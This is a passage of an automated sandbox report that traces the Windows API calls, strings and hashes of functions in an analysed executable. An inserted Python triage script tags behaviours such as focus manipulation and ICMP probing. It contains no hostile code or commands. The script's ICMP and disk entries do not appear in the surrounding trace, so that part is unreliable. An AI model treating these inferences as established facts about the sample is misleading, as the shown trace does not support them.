                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B3C782
                          • GetDlgCtrlID.USER32 ref: 00B3C78D
                          • GetParent.USER32 ref: 00B3C7A9
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B3C7AC
                          • GetDlgCtrlID.USER32(?), ref: 00B3C7B5
                          • GetParent.USER32(?), ref: 00B3C7D1
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B3C7D4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 313823418-1403004172
                          • Opcode ID: ce1c866a1751a90d862ea6a1b3ab1ef38f93bc1ace0c47b7ff8ce3ef12f3ee0e
                          • Instruction ID: c69f8e7e309d7c119f405c2ff682a5f822c6ce3965de187197aba3f8aaf3c8f0
                          • Opcode Fuzzy Hash: ce1c866a1751a90d862ea6a1b3ab1ef38f93bc1ace0c47b7ff8ce3ef12f3ee0e
                          • Instruction Fuzzy Hash: BE217474A00208AFDB05EBA4CC95DFE7BA5EF46310F204196F962E71E1DF745815DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B3C869
                          • GetDlgCtrlID.USER32 ref: 00B3C874
                          • GetParent.USER32 ref: 00B3C890
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B3C893
                          • GetDlgCtrlID.USER32(?), ref: 00B3C89C
                          • GetParent.USER32(?), ref: 00B3C8B8
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B3C8BB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 313823418-1403004172
                          • Opcode ID: 2949ba0bbcf769e6b97f1c7f4aeba4cd54b282338febe5469a124017769ec5ae
                          • Instruction ID: 1c5bee7337c4396d9693be94f8029711a147341ee669ff17ec6db3a4353fdfe8
                          • Opcode Fuzzy Hash: 2949ba0bbcf769e6b97f1c7f4aeba4cd54b282338febe5469a124017769ec5ae
                          • Instruction Fuzzy Hash: C021B071A00208BBDF01ABA4CC85EFEBBB9EF45300F204196F512E31E1EB749915EB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetParent.USER32 ref: 00B3C8D9
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00B3C8EE
                          • _wcscmp.LIBCMT ref: 00B3C900
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B3C97B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend_wcscmp
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1704125052-3381328864
                          • Opcode ID: 1e0c189f45405bc3cb416b62b60de863ad7cb2343518a07813c6df91df3d52d8
                          • Instruction ID: 25258fab54ea8a2178700e946d9c6bff98f3c990b32ce88788854c5f9dff369c
                          • Opcode Fuzzy Hash: 1e0c189f45405bc3cb416b62b60de863ad7cb2343518a07813c6df91df3d52d8
                          • Instruction Fuzzy Hash: 7C11CA76648316BAFA162B74EC0ADA67BECDB17760F310292F904B60E2FFA169014754
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00B4B137
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ArraySafeVartype
                          • String ID:
                          • API String ID: 1725837607-0
                          • Opcode ID: a2d1b5941b2c36a63e57177c3cafcb9e11c8addde5664c5d36330743e2373012
                          • Instruction ID: 4b1b32ace28cebcb2232b2632bda6882de035861fe54767b11df855109b15a77
                          • Opcode Fuzzy Hash: a2d1b5941b2c36a63e57177c3cafcb9e11c8addde5664c5d36330743e2373012
                          • Instruction Fuzzy Hash: 9AC17B75A0021ADFDB04CF99D481BAEBBF4FF08315F2440AAE615E7291C774EA81DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __lock.LIBCMT ref: 00B2BA74
                            • Part of subcall function 00B28984: __mtinitlocknum.LIBCMT ref: 00B28996
                            • Part of subcall function 00B28984: RtlEnterCriticalSection.NTDLL(00B20127), ref: 00B289AF
                          • __calloc_crt.LIBCMT ref: 00B2BA85
                            • Part of subcall function 00B27616: __calloc_impl.LIBCMT ref: 00B27625
                            • Part of subcall function 00B27616: Sleep.KERNEL32(00000000,?,00B20127,?,00B0125D,00000058,?,?), ref: 00B2763C
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B2BAA0
                          • GetStartupInfoW.KERNEL32(?,00BB6990,00000064,00B26B14,00BB67D8,00000014), ref: 00B2BAF9
                          • __calloc_crt.LIBCMT ref: 00B2BB44
                          • GetFileType.KERNEL32(00000001), ref: 00B2BB8B
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00B2BBC4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 1426640281-0
                          • Opcode ID: 59cb039769eb344d14a6d733a5bb00f291a90507f655a9181f91b4b8afb168f3
                          • Instruction ID: ac87ce18abfbefd134dd5ad5d2ec39826d5ebc272b146cb7b5f9400870fe040d
                          • Opcode Fuzzy Hash: 59cb039769eb344d14a6d733a5bb00f291a90507f655a9181f91b4b8afb168f3
                          • Instruction Fuzzy Hash: 6081E9719047658FDB14CF68E884AADBBF0EF49324B24429DD46AA73D1CF349843CB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPath
                          • String ID:
                          • API String ID: 1801721492-0
                          • Opcode ID: d7690e037d86a846d29db299a7b56b9292cb48ab957ab5cabacdb380015d67d9
                          • Instruction ID: 22d477cff25a335c1cba367290b3849818ef609e7f580fbdffaafbf251bbb4bd
                          • Opcode Fuzzy Hash: d7690e037d86a846d29db299a7b56b9292cb48ab957ab5cabacdb380015d67d9
                          • Instruction Fuzzy Hash: 3671FF75A10119AFDB14EFA8D884ADEB7F8EF48310F0485D6E919A7261DB30EE45CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __swprintf.LIBCMT ref: 00B47226
                          • __swprintf.LIBCMT ref: 00B47233
                            • Part of subcall function 00B2234B: __woutput_l.LIBCMT ref: 00B223A4
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B4725D
                          • LoadResource.KERNEL32(?,00000000), ref: 00B47269
                          • LockResource.KERNEL32(00000000), ref: 00B47276
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00B47296
                          • LoadResource.KERNEL32(?,00000000), ref: 00B472A8
                          • SizeofResource.KERNEL32(?,00000000), ref: 00B472B7
                          • LockResource.KERNEL32(?), ref: 00B472C3
                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B47322
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                          • String ID:
                          • API String ID: 1433390588-0
                          • Opcode ID: bf8a0ac82e2394485fc5a2eecf529514a151b78a8e76e8032d024d76a0311dbf
                          • Instruction ID: 3a0fde4f4cabcf91972a36883f488850f36798f59f7292412115e577c47c8fa6
                          • Opcode Fuzzy Hash: bf8a0ac82e2394485fc5a2eecf529514a151b78a8e76e8032d024d76a0311dbf
                          • Instruction Fuzzy Hash: FC31AEB194425AABCF019F60DC89EAB7BE8FF09340B004456F901E3161EB74DA51EBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00B44A7D
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44A91
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B44A98
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44AA7
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B44AB9
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44AD2
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44AE4
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44B29
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44B3E
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44B49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 8a94076a79ce4be7cadbf0b19f54374514ff83b8d8da96df70ff0fde95c26cd4
                          • Instruction ID: 6e0b6be32802c4934bcab50f2e352058a433bb1fc4f1d5314c777d2836bfb194
                          • Opcode Fuzzy Hash: 8a94076a79ce4be7cadbf0b19f54374514ff83b8d8da96df70ff0fde95c26cd4
                          • Instruction Fuzzy Hash: 4131AD71600215BFDB20AF54EC88FBAB7EAEB48721F148446F904D71A0DBB4EE40DB60
                          Uniqueness

                          Uniqueness Score: -1.00%
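
The API listings above are raw per-function traces in the form "• Api.MODULE(args), ref: address". The following is an added example, not part of the Joe Sandbox report, showing how an analyst can parse entries of this shape and attach coarse behaviour tags to them: the ICMP echo routine (WSAStartup, gethostbyname, IcmpCreateFile, IcmpSendEcho), the GetDiskFreeSpaceW/SetErrorMode drive-status routine, the GetForegroundWindow/AttachThreadInput routine and the SendMessageW ComboBox routine. The sample input is copied from those entries on this page; the tag names and the API-set rules in BEHAVIOUR_RULES are my own heuristics, not Joe Sandbox signatures. The IcmpSendEcho argument decoder relies only on the documented parameter order of that function.

```python
import re

# Sample input, copied from four function entries of this report; the bare
# "APIs" headers separate entries exactly as they do on the page.
SAMPLE_REPORT = """\
APIs
• WSAStartup.WS2_32(00000101,?), ref: 00B586F5
• inet_addr.WS2_32(?), ref: 00B5873A
• gethostbyname.WS2_32(?), ref: 00B58746
• IcmpCreateFile.IPHLPAPI ref: 00B58754
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B587C4
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B5884F
• WSACleanup.WS2_32 ref: 00B58855
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00B4EC1E
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B4EC94
• GetLastError.KERNEL32 ref: 00B4EC9E
• SetErrorMode.KERNEL32(00000000,READY), ref: 00B4ED0B
APIs
• GetCurrentThreadId.KERNEL32 ref: 00B44A7D
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44A91
• GetWindowThreadProcessId.USER32(00000000), ref: 00B44A98
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B43AD7,?,00000001), ref: 00B44AA7
APIs
  • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B3C782
• GetDlgCtrlID.USER32 ref: 00B3C78D
• GetParent.USER32 ref: 00B3C7A9
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00B3C7AC
"""

BULLET = re.compile(
    r"^\s*•\s+(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s+)?"
    r"(?P<api>[\w@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Heuristic rules of my own: a tag fires when every listed API is called
# directly (not only inside a "Part of subcall" line) by the same function.
BEHAVIOUR_RULES = {
    "icmp-reachability-probe": {"IcmpCreateFile", "IcmpSendEcho"},
    "hostname-resolution": {"gethostbyname"},
    "drive-status-probe": {"GetDiskFreeSpaceW", "SetErrorMode"},
    "foreground-focus-manipulation": {"GetForegroundWindow", "AttachThreadInput"},
}


def parse_entries(text):
    """Return one list of parsed calls per 'APIs' header in the report text."""
    entries = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
            continue
        m = BULLET.match(line)
        if not m or not entries:
            continue  # metadata lines (Source File, API ID, ...) are skipped
        raw = m.group("args")
        entries[-1].append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub") is not None,
        })
    return entries


def hexval(token):
    """Decode an 8-digit hex argument; '?' and string arguments give None."""
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else None


def decode_icmp_send_echo(call):
    """Name the documented IcmpSendEcho parameters: IcmpHandle, DestinationAddress,
    RequestData, RequestSize, RequestOptions, ReplyBuffer, ReplySize, Timeout."""
    if call["api"] != "IcmpSendEcho" or len(call["args"]) != 8:
        return None
    a = call["args"]
    return {"request_size": hexval(a[3]), "reply_size": hexval(a[6]),
            "timeout_ms": hexval(a[7])}


def tag_entry(calls):
    direct = {c["api"] for c in calls if not c["subcall"]}
    return sorted(t for t, need in BEHAVIOUR_RULES.items() if need <= direct)


def triage(text):
    """One summary row per function entry: first address, call count, tags."""
    rows = []
    for calls in parse_entries(text):
        row = {"first_ref": calls[0]["ref"] if calls else None,
               "n_calls": len(calls), "tags": tag_entry(calls), "icmp": None}
        for c in calls:
            row["icmp"] = decode_icmp_send_echo(c) or row["icmp"]
        rows.append(row)
    return rows


if __name__ == "__main__":
    for r in triage(SAMPLE_REPORT):
        print(f"{r['first_ref']:08X} calls={r['n_calls']:2d} tags={r['tags']} icmp={r['icmp']}")
```

For the ICMP entry the decoder reports RequestSize 5, ReplySize 0x29 = 41 and Timeout 0xFA0 = 4000 ms. The reply size is consistent with the documented minimum of sizeof(ICMP_ECHO_REPLY) (28 bytes on 32-bit Windows) plus the 5 request bytes plus 8 bytes for an ICMP error message, so the caller is a conventional echo probe rather than a covert-channel sender with oversized payloads; the 4-second timeout and the empty-argument second IcmpSendEcho call at 00B587DA are what you would correlate with the "Ping" string ID when writing a host-reachability detection.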

                          APIs
                          • EnumChildWindows.USER32(?,00B3DD46), ref: 00B3DC86
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ChildEnumWindows
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 3555792229-1603158881
                          • Opcode ID: 57fc2dd90fa11a2ceae92782fe53d36f639d6851f04d493c9e87e631ab65d3c0
                          • Instruction ID: c76e242eeef04c28b98b4b4b0b0d533cbd2bfe26dfc44a3acdc36657671384a1
                          • Opcode Fuzzy Hash: 57fc2dd90fa11a2ceae92782fe53d36f639d6851f04d493c9e87e631ab65d3c0
                          • Instruction Fuzzy Hash: 48919231A00506EBCB18DF64D4C1BE9FBF5FF04310F6485A9D85AA7191DF70A99ACBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 00B1C2D2
                            • Part of subcall function 00B1C697: GetClientRect.USER32(?,?), ref: 00B1C6C0
                            • Part of subcall function 00B1C697: GetWindowRect.USER32(?,?), ref: 00B1C701
                            • Part of subcall function 00B1C697: ScreenToClient.USER32(?,000000FF), ref: 00B1C729
                          • GetDC.USER32 ref: 00B7E006
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B7E019
                          • SelectObject.GDI32(00000000,00000000), ref: 00B7E027
                          • SelectObject.GDI32(00000000,00000000), ref: 00B7E03C
                          • ReleaseDC.USER32(?,00000000), ref: 00B7E044
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B7E0CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: 676879c6b4e3aef50dc932f34250a337191a4bfe6e00c6fa872373b4115a59b8
                          • Instruction ID: b62db26acc2cfc39d2ac2dadc6292bbcee678740b4a365b5cb17b4b491510b6c
                          • Opcode Fuzzy Hash: 676879c6b4e3aef50dc932f34250a337191a4bfe6e00c6fa872373b4115a59b8
                          • Instruction Fuzzy Hash: E171B231500209DFCF219F64C885AEA7BF5FF49350F1482E9ED6AAA1A6C731C891DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B54C5E
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B54C8A
                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B54CCC
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B54CE1
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B54CEE
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B54D1E
                          • InternetCloseHandle.WININET(00000000), ref: 00B54D65
                            • Part of subcall function 00B556A9: GetLastError.KERNEL32(?,?,00B54A2B,00000000,00000000,00000001), ref: 00B556BE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                          • String ID:
                          • API String ID: 1241431887-3916222277
                          • Opcode ID: efd9cd56e1a85db6e422448fe26bdb798b250f8f394765f7604dc6d31a5474d5
                          • Instruction ID: 9119def304a6d3f5835f8599f93b8cbc1ecf84613270a2bbd138fb20320b724a
                          • Opcode Fuzzy Hash: efd9cd56e1a85db6e422448fe26bdb798b250f8f394765f7604dc6d31a5474d5
                          • Instruction Fuzzy Hash: 32416FB5501618BFEB129F50CC85FFA77ECEB48315F1041A6FE019A191DB709D888BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B04954,00000000), ref: 00B04A23
                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B1B85B), ref: 00B1B926
                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00B1B85B,00000000,?,?,00B1AF1E,?,?), ref: 00B1B9BD
                          • DestroyAcceleratorTable.USER32(00000000), ref: 00B7E775
                          • DeleteObject.GDI32(00000000), ref: 00B7E7EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
